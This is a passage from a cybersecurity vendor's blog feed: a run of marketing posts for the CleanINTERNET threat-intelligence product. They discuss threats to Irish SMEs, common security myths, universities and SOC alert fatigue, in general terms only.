before the next headline-making breach.No More Time to WaitWith 98 of Ireland's 222 critical infrastructure organizations showing exposed vulnerabilities, the margin for error has evaporated. The threat landscape isn't just growing—it's accelerating and evolving in real time.Organizations face a choice: remain in the calm before the storm, reacting to each new incident, or move proactively to stay ahead of threats that are already at the gates.The intelligence is clear. The risks are documented. The path forward is proven.The only question left is: which side of that 44% vulnerability statistic do you want to be on when the next wave hits? --- ### [The Next Chapter in Stopping Threats Before They Breach Your Network](https://www.centripetal.ai/blog/the-next-chapter-in-stopping-threats-before-they-breach-your-network) Published: 2025-08-19 Summary: The future of cybersecurity is quiet. Always on, always working, stopping threats before they reach your network. You’ll notice things look different. Because the world you’re defending has changed—and so have the stakes.Every breach proves the same thing: the tools you’ve been given aren’t enough. Firewalls let attacks through. “Next-gen detection” leaves you drowning in alerts after the fact. Threat intelligence is treated like a forensic tool, not a preventative defense. All while you and your team are expected to carry the weight—burned out, overburdened, and still on the hook for preventing the next breach.We’ve heard you. You don’t need more feeds, more dashboards, or more noise. You need something that’s preventative, always on, and working for you before an attack ever lands.And that’s why we look different today: not because who we are has changed, but because how we tell our story—and how clearly we show the value we bring to you—needed to.But here’s what hasn’t changed: who we are. Our mission. And our relentless commitment to protecting you before threats ever reach your network. Who We AreFrom the beginning, Centripetal has been built on a simple mission: stop threats before they ever reach your network. We don’t add to the noise—you already have too much of that. We eliminate it.We combine the most complete collection of threat intelligence in the world with AI capable of one sextillion decisions per second, and the ingenuity of a team that knows what it means to stand in the breach. The result is the most effective proactive defense available. Always watching. Always working. Always acting before damage is done. What’s Changed, and What Hasn’tYes, things look different. The way we present ourselves and tell our story has evolved—because you deserve clarity, not clutter.Our mission is still to stop threats before they ever breach your network. And the principles that make that possible remain the same.It starts with scope: the most complete intelligence available, billions of indicators from thousands of feeds, all working for you in real time. It’s matched by speed: an AI-accelerated platform capable of enforcing policy at internet scale, stopping billions of threats before they reach you. And it’s driven by skill: analysts, engineers, and operators who know how to act decisively when the stakes are highest.Our values haven’t changed either. We stand in the breach with you. We move fast when it matters most. And we bring the full weight of our expertise to protect what matters to you. The Noise You’re Up AgainstYou don’t need to be told how hard your job is. You live it. Constant alerts. Endless dashboards. Perpetual noise. Every new tool promises to make it easier, but too often it just adds more hay to the stack—and never actually removes the needles.You’ve told us the same thing, again and again: you don’t need more feeds, more alerts, or more reports. You need prevention. You need quiet. You need to know that when it matters most, your defenses are already working—automatically, around the clock. The Way ForwardReal security isn’t about how much you can see after the fact—it’s about what never reaches you in the first place. Our customers measure our value not by noise on their network, but by the quiet that comes when attacks are stopped cold.That’s the future of cybersecurity:Threats prevented before they materialize.Breaches stopped before they breach.A defense that is always on, always working, and always on your side.We may look different. We may tell our story differently. But our purpose hasn’t changed. We stop threats before they reach you.The end of empty promises starts here. A new era of prevention has already begun. --- ### [The Evolution of Cybersecurity: From Firewalls to Intelligence-Driven Defense](https://www.centripetal.ai/blog/the-evolution-of-cybersecurity-from-firewalls-to-intelligence-driven-defense) Published: 2025-07-24 Summary: SMBs face relentless threats—but it’s outdated beliefs that create the biggest gaps. Learn how false assumptions are leaving you exposed, and what protection today should look like. By CentripetalThe cybersecurity landscape has undergone dramatic transformation since the early days of the Internet. What began as a revolutionary communication platform has evolved into a complex battleground where defenders struggle to keep pace with increasingly sophisticated threats. Understanding this evolution is crucial for organizations seeking to regain the defender's advantage in an era of exponential digital growth.   The Five Eras of Cybersecurity The First Era: The Birth of Connectivity The internet was born from an extraordinary achievement: the ability for anyone with a router and a switch to connect to anyone else. It ushered in a new age of communication, commerce, and innovation. But baked into that open design was a critical flaw—there was no mechanism to distinguish between communications that constituted mission and those that constituted risk. The internet had no native ability to discriminate between legitimate and malicious traffic. That missing layer of discernment is the origin of every cybersecurity challenge we face today. The Second Era: The Firewall Era The industry's first attempt to solve the problem was the firewall. And it was built on a simple, binary assumption: trust everything inside the perimeter, and distrust everything outside. But that line of thinking didn’t hold up for long. Malware didn’t respect physical or logical boundaries. Users inside the network weren’t always trustworthy. And that assumption of insider trust was quickly and repeatedly exploited—revealing that the perimeter alone couldn’t protect what mattered. The Third Era: Signature-Based Detection As perimeter defenses failed, the industry turned to inspecting the contents of traffic—breaking open packets and comparing them against known threat signatures. At first, this seemed like a promising strategy. With a few hundred, maybe a few thousand signatures in play, defenders could keep pace. But then came polymorphic malware. Threat actors learned to evade detection by changing a single bit, generating infinite variations that rendered signature-based defenses obsolete. What started as a manageable task quickly became a game of digital whack-a-mole—an unscalable, unsustainable approach. The Fourth Era: The Endpoint Focus Recognizing network-based approaches had limitations, attention shifted to the endpoint—the so-called “last line of defense.” Organizations tried to secure every device, every user, everywhere. But the reality on the ground told a different story. Today, there are more than 75 billion connected devices. Many of them are unmanaged. Many aren’t even owned by the organization. And the sheer scale has proven that while endpoints matter, they cannot carry the burden of defense alone. As a standalone strategy, it’s not strategic enough to keep up. The Fifth Era: Intelligence-Driven Defense We’ve reached a new inflection point. The volume, speed, and adaptability of modern threats demand a fundamentally different model—one that can scale. One that can make sense of a dynamic threat landscape in real time. And one that doesn’t rely on trust assumptions, static signatures, or reactive endpoints. That model is intelligence-driven defense. Not just collecting intelligence—but operationalizing it. Making real-time decisions at internet scale. Preventing threats before they ever become breaches. This is where cybersecurity must go next—and where real protection begins. The Intelligence Revolution The breakthrough came from recognizing a fundamental truth about cybersecurity intelligence: no single provider has comprehensive coverage of global threats. Analysis of major intelligence sources reveals that even the best providers share only single-digit percentage overlap in their threat data. This fragmentation means that relying on any single intelligence source—no matter how reputable—leaves massive blind spots in your defense. The solution lies in collaborative defense at unprecedented scale. Modern intelligence-driven platforms now harness threat data from global communities of researchers, applying billions of unique Indicators of Compromise (IOCs) across network traffic in real-time. In a typical seven-day period, advanced platforms process over 39 billion unique IOCs from threat intelligence experts worldwide, each researching different actors, techniques, and attack vectors. The Data Science Challenge Operating at this scale requires solving one of computing's most complex data science problems. The challenge isn't just processing massive datasets—it's making instantaneous decisions with perfect precision. Each network packet must be evaluated against billions of threat indicators while maintaining zero-latency performance and avoiding false positives that could disrupt legitimate business operations. Traditional computational approaches simply cannot handle this scale. The industry has had to invent entirely new classes of technology, including sublinear search algorithms that become more efficient as they process larger datasets. Even these innovations are being pushed to their limits as threat landscapes continue expanding faster than individual research capabilities can track. Reclaiming the Defender's Advantage The defender's advantage has been steadily eroding as attack complexity grows exponentially while defensive capabilities scale linearly. Intelligence-driven defense represents the first strategic solution capable of reversing this trend by: Enabling global collaboration among threat researchers and defenders Processing threat intelligence at unprecedented scale through advanced algorithms Making real-time decisions with precision across all network traffic Adapting dynamically to new threats without manual signature updates The Path Forward The future of cybersecurity isn't about choosing between firewalls, endpoint protection, or network monitoring—it's about integrating these layers within an intelligence-driven framework that can scale with modern threats. Organizations must embrace collaborative defense models that harness global threat intelligence while maintaining the precision needed for zero-trust security implementation. The cybersecurity industry stands at an inflection point. Those who recognize that isolated, single-vendor approaches are fundamentally inadequate for modern threats will gain strategic advantages. Those who continue relying on legacy assumptions about network boundaries, signature matching, or endpoint-only strategies will find themselves increasingly vulnerable in an exponentially complex threat landscape. The question isn't whether your organization will adopt intelligence-driven defense—it's whether you'll do so proactively or reactively after experiencing the limitations of previous-generation approaches firsthand. Learn more about intelligence driven defenses, here. --- ### [Outdated Systems and Modern Attacks: Ireland’s Cyber Reckoning Has Arrived](https://www.centripetal.ai/blog/outdated-systems-and-modern-attacks-irelands-cyber-reckoning-has-arrived) Published: 2025-07-17 Summary: Ireland’s cyber vulnerabilities aren’t hidden—they’re known, unpatched, and easily exploited. From outdated systems to rising ransomware campaigns, attackers are taking advantage of the low-hanging…  Cybercriminals don’t need to be sophisticated. They just need the opportunity—and in Ireland, there’s still too much low-hanging fruit.Many of the vulnerabilities being exploited across Irish networks today aren’t new. They’re years old. Attackers are taking advantage of outdated systems that haven’t been patched, relying on free, off-the-shelf tools to scan for weaknesses—and finding them far too easily.This isn’t a theoretical risk. It’s happening right now. And it’s putting businesses, infrastructure, and services at increasing risk.Ireland’s Growing ExposureAttackers are using automated tools like Shodan and Censys to identify systems running known vulnerabilities—many of which have had available patches for years. Apache servers are one common target, still running outdated versions that open the door to remote access and deeper infiltration.“The top vulnerabilities we’re seeing exploited in Ireland are really old,” says Aileen Ward, Senior Intelligence Operations Analyst at Centripetal.It’s a reminder that the problem isn’t always complexity. It’s complacency.And the barrier to entry has never been lower. Malware kits are widely available. Breach guides are circulating in open forums. And when you combine those tools with a bit of social engineering—phishing emails, spoofed IT support calls—technical defenses can quickly be bypassed. The result? An environment where even well-resourced organizations are still vulnerable to basic tactics.Ransomware Isn’t Just Back—It’s EvolvingGroups like Scattered Spider, once relatively quiet, are now re-emerging with coordinated campaigns and new partners. In just the last year, they’ve gone from zero documented attacks to a growing list that includes healthcare, aviation, and insurance sectors.These aren’t scattershot attempts. They’re highly targeted operations, often engineered to trigger urgency and exploit trust. One campaign dubbed Click Fix was aimed specifically at healthcare workers—pressuring them into opening malicious links disguised as urgent system updates.Ransomware isn’t just a data problem anymore. It’s a continuity problem. A resilience problem. And in sectors like healthcare or critical infrastructure, it’s increasingly a life-safety problem.Cybercrime Isn’t Local AnymoreWhile the threats may feel close to home, their origins—and implications—are often global. Rising international tensions are contributing to a surge in nation-state activity, and the ripple effects are landing directly in private-sector networks.It’s no longer just government agencies that need to think about geopolitical risk. Financial firms, energy providers, universities, and even small businesses can all be caught in the crossfire. Threat intelligence has to evolve to meet this complexity—linking local events to global patterns, and filtering signal from noise in real time.So What Can You Do?The good news is that progress doesn’t always require a full security overhaul. Here’s where organizations can start today:Patch the Basics – Many of the most exploited vulnerabilities are old and easily preventable. Fixing them closes the door to opportunistic attacks.Move Beyond Alerts – Static alerts aren’t enough. Actionable threat intelligence that proactively blocks known threats at the edge is essential.Train for Reality – Technical tools help, but your team is still the first line of defense. Make sure they know how to spot social engineering tactics and respond appropriately.Stay Vigilant – Ransomware tactics shift. Global conflicts escalate. Cyber defense is no longer just about reacting—it’s about anticipating.It’s Time for a New ModelIreland’s cyber challenge isn’t unique—but the consequences are real. As threat actors evolve, so must our defenses. That means moving away from legacy systems, static policies, and reactive thinking—and embracing an intelligence-powered model that actively prevents threats, not just detects them.As Ward says, “It’s not just about surviving today’s threats. It’s about being ready for what’s coming next.”If your current defenses are built for the attacks of five years ago, they won’t stand up to the next five months.It’s time to adapt faster than the attackers do.Watch the full session on demand.  --- ### [What’s Really Putting SMBs at Risk? These 8 Cybersecurity Myths](https://www.centripetal.ai/blog/whats-really-putting-smbs-at-risk) Published: 2025-07-16 Summary: SMBs face relentless threats—but it’s outdated beliefs that create the biggest gaps. Learn how false assumptions are leaving you exposed, and what protection today should look like. If you’ve done everything you can think of to stay protected — patched systems, trained employees, upgraded tools — but the number of threats still keep increasing, you’re not alone.You’re not behind. You’re not unprepared. But you may be operating on outdated assumptions.For small and midsize businesses, the real danger isn’t just what attackers are doing—it’s the cybersecurity myths you’ve been told to believe. The ones that seem logical. Safe. Even helpful. But they leave gaps that attackers are counting on. And, if these myths are still shaping your strategy, it’s time to rethink your  model.Myth 1: We’re too small to be a target.Reality: The businesses that can least afford a breach are often the ones least protected.Many small and midsize businesses assume that their size shields them from targeted attacks. But in today’s cyber threat landscape size isn’t a deterrent—it’s a vulnerability. Cybercriminals know that SMBs often lack the internal resources, time, or budget to deploy enterprise-grade protection. That’s precisely why they strike.This isn’t theoretical. Microsoft’s Digital Defense Report revealed that over 70% of ransomware attacks hit organizations with fewer than 1,000 employees. In Ireland, FraudSMART reported that 68% of SMEs faced cybercrime attempts in just the past year.The true risk lies in the imbalance. While large enterprises can absorb the impact of a breach, most SMBs cannot. The cost of ransomware recovery, reputational damage, and regulatory fines can be existential.That’s where CleanINTERNET® levels the playing field.  It brings enterprise-level security to SMBs — without enterprise-level complexity or cost. We combine the largest collection of global threat intelligence with AI-accelerated processing and expert human analysis — blocking all known threats before they reach your network, at wire speed. It’s real-time protection that fits your business, and scales without adding burden.Myth 2: Our firewall is enough.Reality: Firewalls only enforce what you already know.Most businesses have a firewall in place. But here’s the problem: every successful cyberattack you’ve ever read about, happened with a firewall already in place. Firewalls are essential for perimeter control, but they rely on static policies. They aren’t built to evaluate billions of new indicators daily, or to identify zero-day infrastructure as it emerges.Modern threats bypass firewalls through DNS manipulation, encrypted traffic, credential misuse, or compromised cloud platforms. Meanwhile, intelligence on malicious infrastructure evolves constantly, in near real-time. And static enforcement solutions just can’t keep up.CleanINTERNET® acts before the firewall. It processes more than 10 billion unique indicators of compromise, updated every 15 minutes, to enforce at wire speed. It recognizes and blocks malicious domains, IPs, URIs, hashes, and the list goes on — that firewalls simply can’t interpret in real-time. This means your firewall no longer has to catch everything — because CleanINTERNET® already stopped it.Myth 3: Ransomware isn’t really our problem.Reality: Ransomware targets businesses that can’t afford downtime.For many SMBs, ransomware seems like something that only hits the headlines—an enterprise issue. But the data tells another story. In 2024, the EU Agency for Cybersecurity (ENISA) reported a 68% increase in ransomware attacks against European SMBs. And according to the Irish SME Association (ISME), 27% of small Irish businesses faced attempted ransomware attacks last year.These aren’t opportunistic one-offs. Today’s ransomware ecosystem includes affiliates, automation, and targeted lures that make it cheaper and faster to exploit smaller organizations with weaker defenses. The stakes are high: even with backups, data is often exfiltrated and used for double extortion — and recovery can still cost six figures.CleanINTERNET® disrupts ransomware campaigns before they reach execution. It blocks access to known command-and-control infrastructure, distribution domains, IP staging zones, and payload delivery systems in real-time. The result? No payloads, no encryption, no payout.Myth 4: Our spam filter stops phishing.Reality: Email security stops messages — CleanINTERNET® stops what happens next.Phishing has evolved. Messages are now more targeted, more convincing, and often contain no obvious malicious payload — just a well-crafted impersonation. In some cases, attackers use compromised vendor accounts to carry out invoice fraud or gain privileged access.Despite secure email gateways, phishing still works. FraudSMART found that Irish SMEs lost more than €17 million to email scams in just two years.CleanINTERNET® picks up where email protection leaves off. If a user clicks a link in a deceptive email, CleanINTERNET® can block the outbound connection to the phishing site, login portal, or command server — even if the email was never flagged. It’s the final control that prevents a simple mistake from becoming a breach.Myth 5: We cannot control third-party risk.Reality: You may not control your vendors, but you can control how your network interacts with them.The average SMB relies on dozens of third-party platforms—from accounting software and CRM tools to outsourced IT providers. These relationships are critical to efficiency, but they also introduce new exposure. If a vendor is breached, your systems can be compromised indirectly.According to PwC’s Cybersecurity Outlook 2025, 48% of Irish organizations now cite third-party risk as a top concern. Yet most SMBs lack the resources to monitor or evaluate their supply chain continuously.CleanINTERNET® solves this with real-time enforcement. It dynamically blocks communication with known-compromised vendors, hijacked SaaS portals, and malicious third-party infrastructure based on global threat intelligence. You may not control your vendor’s security—but you can stop their breach from becoming your problem.Myth 6: Compliance is separate from security.Reality: Real-time enforcement supports both resilience and regulation.New frameworks like NIS2 and DORA have raised the bar for cybersecurity governance across the EU. But many Irish SMBs are still scrambling to understand what compliance requires in practical terms.Irish Tech News reported that 76% of IT leaders say their organizations are still unprepared for new mandates. The misconception is that compliance requires a second team or an entirely new stack. In reality, the best compliance control is an active defense.CleanINTERNET® enforces zero-trust principles and blocks threats in real time, logs every event, and provides the evidence needed to demonstrate compliance—without adding operational complexity.Myth 7: We’ll worry about incident response once we grow.Reality: If you don’t have a SOC, you need one that works for you—not just when you grow, but now.It’s easy to put incident response planning on the back burner, especially when budgets are tight and teams are small. But attackers don’t wait. The longer it takes to detect and contain a breach, the more damage it does—financially, operationally, and reputationally.According to the Ponemon Institute, the average time to detect and contain a breach remains over 45 days for SMBs. And VM Group data shows that only 28% of Irish SMBs have a formal incident response plan in place.The challenge isn’t awareness—it’s resourcing. Most SMBs can’t build a 24/7 SOC or hire a team of analysts. But that doesn’t mean you have to go without one.CleanINTERNET® acts as a virtual SOC—bringing together real-time threat enforcement and expert analysis. It identifies malicious behavior at the edge, blocks known threats before they reach your systems, and escalates only what matters. That means:Continuous visibility without alert fatigueReal-time, intelligence-driven enforcementExpert-driven triage and reporting without internal burdenIncident response doesn’t have to start with a team. It starts with having the right infrastructure in place to stop threats before they escalate—and to respond when it matters most.Myth 8: Without DLP, we can’t protect our data.Reality: Most data loss occurs through malicious infrastructure—not misclassified files.Data loss prevention (DLP) systems are often recommended to protect sensitive information. But for SMBs, they’re typically overkill: complex to manage, expensive to deploy, and prone to false positives.What’s more, most data exfiltration today doesn’t happen via email attachments or mislabeled documents. It happens through encrypted tunnels, beaconing malware, or unauthorized outbound connections to known exfiltration servers.CleanINTERNET® intercepts those connections at the edge. By blocking known exfiltration channels—whether via FTP, HTTPS, DNS tunneling, or other techniques—you prevent data loss before it requires classification. The best DLP? Stopping the leak before it starts.The Bottom LineThis is where the myths end, and real protection begins.You’ve been told to rely on alerts. To detect what’s already reached you. To react fast. But if you’re constantly reacting, you’re already behind.At Centripetal, we deliver what security leaders need most: threats stopped before they ever reach your network.CleanINTERNET® is the world’s most effective proactive network defense—combining the largest collection of global threat intelligence with AI-accelerated processing and expert human analysis. We process more than 10 billion threat indicators at wire speed, blocking attacks in real time, all the time.It’s threat intelligence, artificial intelligence, and human intelligence—working together at a speed and scale no one else can match.We stand in the breach so you don’t have to. Always watching. Always working. Always ahead.At Centripetal, we don’t just detect threats—we stop them.No responding. Just better protection.Want to see what this kind of protection looks like in your environment? Schedule time to see how it works. --- ### [Breaking the Intelligence Ceiling: CleanINTERNET®️ Horizon Changes Everything](https://www.centripetal.ai/blog/breaking-the-intelligence-ceiling-cleaninternet-horizon-changes-everything) Published: 2025-06-27 Summary: For large research hospitals, it’s challenging to empower people to continue to carry out their research, duties and care, while simultaneously providing secure access to the tools and processes they… One source of threat intelligence isn’t enough. It never was.While cyber threat intelligence datasets have exploded in size, the minimal overlap between providers remains static—leaving massive blind spots in your defense. True community-based protection demands comprehensive intelligence from multiple sources, detection methods, and global collectors targeting diverse threat actors.We’ve shattered the decision rate barrier.Processing a million IOCs was once groundbreaking. Today, we’ve achieved something revolutionary: CleanINTERNET® 6.0 Horizon. Our newest release of CleanINTERNET® processes over ten billion IOCs with sextillion-range decisions per second at wire speed, that is 10x the previous capacity. This isn’t incremental improvement—it’s a complete reimagining. We rewrote our filter algorithms and redesigned our processing architecture to operationalize more intelligence than any security platform on earth, including nation-state capabilities. The result? Precision threat classification and resolution that no other platform can match—not even one percent of our capacity.Here’s what sets us apart:We apply more intelligence than anyone in the security communityWe have the capacity to support future growth of available intelligenceWe make fine-grained decisions on the entirety of tracked intelligenceWe avoid false positives while processing massive packet flows bidirectionallyHere’s what it means for you:Strengthens your security posture by neutralizing known threats before they cause harm.Dramatically reduces the attack surface and vulnerability exposure by preventing infiltration and exfiltration.Greatly improves the efficiency and effectiveness of Security Operations by reducing alert volumes and false positives.Promotes uninterrupted business operations due to no network latency. Lowers costs for downstream security tools since malicious traffic is stopped before reaching them.We’ve got you covered across your infrastructure:The benefits of CleanINTERNET® Horizon are delivered across our solution portfolio:CleanINTERNET® Enterprise – Whether on-premises or in the cloud, preempts infiltration and stops exfiltration by blocking threats at the network edge.CleanINTERNET® DNS – Identifies and blocks communication with harmful or suspicious domains.CleanINTERNET® Access – Extends the benefits of CleanINTERNET® Enterprise to mobile devices, even BYOD.CleanINTERNET Fusion™ – Delivers intelligent, automated, and highly localized threat defense against emerging and targeted attacks.Ready to experience the future of threat intelligence? Get in touch today. --- ### [Navigating the New Cyber Threat Landscape: Why Irish SMEs Must Think and Act Differently](https://www.centripetal.ai/blog/why-irish-smes-must-think-and-act-differently) Published: 2025-05-07 Summary: Cyberattacks on Irish SMEs are growing more sophisticated. With legacy tools falling short, it’s time to rethink how we defend our businesses in real time. By Mike McKnight, CEO of Intuity Technologies The Constant Challenge to Stay Secure   Let's be honest, keeping your business safe online feels like a never-ending race these days, especially for Small and Medium Enterprises (SMEs). At Intuity Technologies, we see it every day: the bad guys are getting smarter, faster, and ultimately relentless. With IT budgets often stretched thin, and the digital world constantly developing - it's tougher than ever for SMEs to stay secure. The old ways of doing things just aren't cutting it anymore; we need to think differently and embrace new ideas to get ahead.  The Growing Headache of Cyber Threats  The threats facing Irish businesses aren't stagnant. We're seeing more and more ransomware attacks, those sneaky phishing emails, and serious data breaches. Irish SMEs lost over €17 million through email-related scams in the last two years. And sadly, SMEs are often easier targets due to their limited resources, lower security awareness, and outdated technology infrastructure compared to bigger organisations. The impact of a cyberattack? It can be devastating, both to your bank balance and your reputation. This isn't some far-off worry; it's happening right now, and it's a real concern for businesses across Ireland.  But what if your network could automatically block known malicious traffic before it even reached your systems? What if it could tap into a constantly updated stream of threat intelligence and handle it all automatically, in real time? It's not just about reacting faster when something happens. It's about preventing it from happening in the first place. The smarter your network's defences, the less you have to worry about.  Time to Think and Act Smarter  Here at Intuity Technologies, we get that a fresh perspective is crucial. While the usual cybersecurity measures are still important, they're simply not enough against today's sophisticated cybercriminals. The way forward involves blending cutting-edge security technology with the sharp minds of experts who can understand, respond to, and act on real-time threats before they cause real damage.  How do you defend against something you can't even see coming?   You've probably invested in firewalls, endpoint detection, multi-factor authentication, and staff training. But threats still get through. It's not necessarily that your tools are bad but the threats are evolving so rapidly, they outpace traditional defences. Often, your network traffic can be a blind spot, either considered too trustworthy or too noisy to analyse effectively, or you only realise something's wrong when it's too late. But imagine if your network could automatically spot and block traffic from known malicious sources, using up-to-the-minute global threat intelligence, and reduce your exposure before an incident even occurs.  Partnering with Centripetal for Intelligence Powered Cybersecurity  This is why Intuity Technologies is thrilled to announce our partnership with Centripetal, a leader in a smart, intelligence powered approach to cybersecurity. By leveraging Centripetal's real-time threat intelligence capabilities, we can offer SMEs across Ireland a level of protection against evolving cyber threats that was previously out of reach. This partnership means businesses can have access to the most advanced security solutions, allowing them to focus on growing and innovating without constantly worrying about cyberattacks.  Think of it this way: your firewall is essential, but it might not be enough on its own. Today's cyber threats don't politely knock on the door. They probe, disguise themselves, and adapt - they are constantly changing and blending in with normal internet traffic. Traditional defences are still vital, but here's the truth: if your network is making security decisions based on yesterday's threats, you're already playing catch-up. The new way of thinking is to apply real-time, global threat intelligence to every connection request, blocking known malicious sources before they can even interact with your systems. This reduces risk, cuts through the noise of false alarms, and minimises the time a threat could lurk undetected – all without slowing down your business.  Embracing Change and Innovation for a Secure Future  The digital age demands a new mindset when it comes to cybersecurity – one that welcomes change, embraces innovation, and focuses on smart, proactive strategies. With the right technologies and expert support in place, SMEs can confidently navigate the digital world while staying secure in this developing threat landscape. It's not just about installing a new piece of software; it's a fundamental shift in how we approach security. Moving from simply reacting to threats to intelligently preventing them. We believe the future of cybersecurity lies in building a strong foundation of network-level protection that's not just a part of the solution. It is the foundation.  About the Author Mike McKnight has been at the helm of Intuity Technologies since 2023, steering the company to new heights as a premier Managed Service Provider and Digital Transformation partner. Under his dynamic leadership, Intuity proudly serves over 300 clients across diverse industry sectors in Ireland. Mike is dedicated to delivering top-notch service while proactively guiding clients through the adoption of cutting-edge technologies. His mission? To help businesses scale, enhance efficiency, and safeguard their future in an ever-evolving digital landscape.  --- ### [Does Higher Ed Mean Higher Risk? Why University Campuses Are Under Threat ](https://www.centripetal.ai/blog/understanding-the-cyber-threats-to-universities) Published: 2025-03-26 Summary: Universities face over 3,500 cyberattacks per week — the highest of any industry. Learn how intelligence-powered cybersecurity can protect campus networks, research data, and critical infrastructure… Universities are built for openness, but that openness comes with a steep price. Higher education institutions face an average of 3,574 cyberattacks per week, the highest of any industry. With open networks, unmanaged devices, and critical research infrastructure, they have become a prime target for cybercriminals, nation-state actors, and ransomware groups. The latest research shows that 77% of educational institutions experienced a cyberattack in the last 12 months, up from 69% in 2023. The most common attack vectors include phishing, ransomware, and account takeovers, leading to millions in unplanned expenses, compliance fines, leadership changes, and reputational damage. The mass hack of the file-sharing tool MOVEit in 2023 affected nearly 900 colleges, underscoring the urgent need for stronger cybersecurity in higher ed. The Risks of Legacy IT and IoT Vulnerabilities Many universities rely on outdated IT infrastructure, making them vulnerable to backdoor exploits. Legacy systems, originally designed for academic collaboration rather than security, create a patchwork of vulnerabilities. Attackers increasingly target research institutions, seeking to steal intellectual property (IP), financial data, and government-funded research. Cybercriminals also exploit IoT-connected infrastructure such as security cameras, HVAC systems, and emergency alert networks, using them as entry points for attacks. Higher education saw the highest rate of DDoS attacks in early 2024, crippling network access and disrupting operations. A single vulnerability in an IoT device can lead to ransomware attacks, data exfiltration, or even campus-wide outages. Ransomware in Higher Education: A Growing Crisis In 2024, 66% of higher education institutions were hit by ransomware. Attackers lock down student records, financial systems, and research data, demanding payments that can reach millions. The University of California San Francisco (UCSF) paid $1.14 million in ransom to recover critical medical research data. Meanwhile, the University of the West of Scotland suffered a cyberattack that exposed over 1 million personal records, contributing to a $18 million financial deficit. Ransomware attacks disrupt learning environments, delay coursework submissions, and even prevent students from accessing tuition payment systems. The financial and operational fallout from these incidents can take years to recover from. The Impact of Remote and Hybrid Learning on Security The shift to remote and hybrid learning has dramatically expanded universities' attack surfaces. Students, faculty, and staff now access institutional networks from personal devices and home Wi-Fi, making social engineering attacks like phishing and credential theft easier than ever. Unsecured endpoints and personal accounts create an entry point for lateral movement across university networks, putting entire institutions at risk. The Solution: Intelligence-Driven Cybersecurity Traditional security solutions are reactive—they detect and respond after an attack occurs. Higher education institutions need a proactive approach that prevents attacks before they happen. Intelligence-powered cybersecurity blocks known threats at the network’s edge, eliminating risk before malicious traffic can infiltrate university systems. A real-time intelligence-driven security model delivers: Automatic threat blocking: Prevents ransomware, phishing, and malware attacks before they reach users.Protection for IoT infrastructure: Secures critical systems, including research labs, campus security, and student data.Reduced alert fatigue: Stops threats before they generate alerts, allowing security teams to focus on strategic efforts.Lower security costs: Reduces the need for expensive SIEM storage and security infrastructure upgrades. A Smarter Cybersecurity Strategy for Higher Education Cyber threats are evolving, and legacy security models no longer suffice. To protect research, students, and institutional integrity, universities must adopt intelligence-powered cybersecurity that prevents attacks at scale. Speak with a higher education cybersecurity expert, today.  --- ### [Enhancing Cybersecurity in Higher Education: A Shift-Left Approach](https://www.centripetal.ai/blog/enhancing-cybersecurity-in-higher-education-a-shift-left-approach) Published: 2025-03-25 Summary: Higher education faces growing cyber threats. Learn how a shift-left cybersecurity strategy — focusing on early-stage detection beyond traditional tools like IDS, DLP, and EDR — can protect… Securing a Higher Education Campus remains a significant challenge. There is a direct conflict between the open collaborative nature of our advanced institutes of learning and the perennial need to lock down all sources and targets of cyber threats. For example, in an EDUCAUSE survey, it identified cybersecurity as the number one IT issue for universities in 2024, reflecting the immense pressure on security teams. The Cyber Kill Chain outlines the typical stages of an infrastructure attack, from initial reconnaissance to the final execution of malicious objectives and provides insight into where proactive measures can be taken to reduce its impact. Traditional security tools such as Intrusion Detection Systems (IDS), Data Loss Prevention (DLP), and Endpoint Detection and Response (EDR) are designed to identify and flag anomalous behavior deep within the network. However, due to the rapid spread of cyber threats in a campus environment, these tools often detect security incidents only after an attack has already occurred. By the time an alert is generated, malware may have already established a foothold, making mitigation significantly more challenging. Focusing effort on the early stages of the kill chain - specifically reconnaissance and initial access - is a preferred approach to preventing breaches in a campus network. This is referred to by Gartner and others as a ‘Shift Left’ approach. The detect and respond approach is inadequate in today’s fast moving threat environment. By leveraging threat intelligence at scale, it is possible to screen every packet of data entering or leaving the network, identifying traffic to or from known malicious domains. Such an approach enables the eradication of reconnaissance traffic, and most of the threat traffic found in a typical campus network. Centripetal does this for many large educational institutions around the world. By adopting this ‘Shift Left’ approach, higher level education organizations can reduce their security exposure significantly without incurring significant cost. Centripetal enables higher education institutions and universities to proactively mitigate cyber threats at the earliest possible stages of the Cyber Kill Chain, reducing risk exposure before attacks can escalate. Traditional cybersecurity approaches often focus on reactive detection and response at later stages such as Exploitation, Installation, and Command & Control. However, our Shift Left approach emphasizes pre-emptive threat intelligence, predictive analytics, and automated enforcement, allowing universities to stop threats before they materialize into breaches. By applying advanced threat intelligence-driven security, Centripetal ensures that malicious reconnaissance activities are neutralized, preventing adversaries from gathering valuable information about institutional networks. Our automated enforcement mechanisms block known threat actors prior to the Delivery and Exploitation phases, significantly reducing the attack surface, without placing additional operational burden on university security teams. This proactive security model helps higher education organizations enhance their cyber resilience, ensuring compliance with data protection regulations (GDPR, FERPA, etc.) while reducing the cost and complexity of traditional security operations. By integrating our Shift Left strategy with existing security frameworks, universities can focus their resources on innovation and research, rather than constantly firefighting cyber threats. Learn more about how Centripetal can protect your higher education institution with a shift left strategy today.   --- ### [How to Combat Alert Fatigue to Retain and Empower Your Security Teams](https://www.centripetal.ai/blog/how-to-combat-alert-fatigue-to-retain-and-empower-your-security-teams) Published: 2024-11-22 Summary: To mitigate alert fatigue and its downstream effects on employee retention, a shift from reactive to proactive security operations is essential. In the high-stakes world of cybersecurity, organizations must ensure that their teams not only protect the organization but also stay motivated and productive. One of the most insidious threats to achieving this goal is alert fatigue. When analysts are bombarded with thousands of security alerts daily, they risk becoming overwhelmed and disillusioned in their roles. This fatigue can lead to missed critical threats, decreased job satisfaction, and ultimately, high employee turnover—a significant challenge for leadership, not to mention a large cost.  The Emotional Cost of Alert Fatigue: Staff Morale and Retention  Research from Forrester found that security teams received an average of 11,000 security alerts daily, a volume they were not equipped to handle. For this reason, 28% of alerts are never addressed. Alert fatigue impacts more than just operational efficiency; it erodes job satisfaction. SOC analysts often enter the field with ambitions of engaging in meaningful cybersecurity work—detecting sophisticated threats, responding to incidents, and improving defenses. However, when their days are consumed by the repetitive task of triaging endless alerts, many start to feel undervalued and disengaged. This monotony, paired with high stress levels, leads to disillusionment and, ultimately, employee churn. Why Employee Churn is a C-Suite Concern Employee turnover in cybersecurity teams is particularly problematic. High Recruitment Costs: Finding skilled SOC analysts is costly and time-consuming. The process of recruitment, vetting, onboarding and continuous upskilling of new talent places a strain on resources.Loss of Expertise: Experienced analysts who understand the organization’s unique threat landscape are invaluable. When they leave, their institutional knowledge is lost, impacting team effectiveness and continuity.Morale and Team Dynamics: High turnover 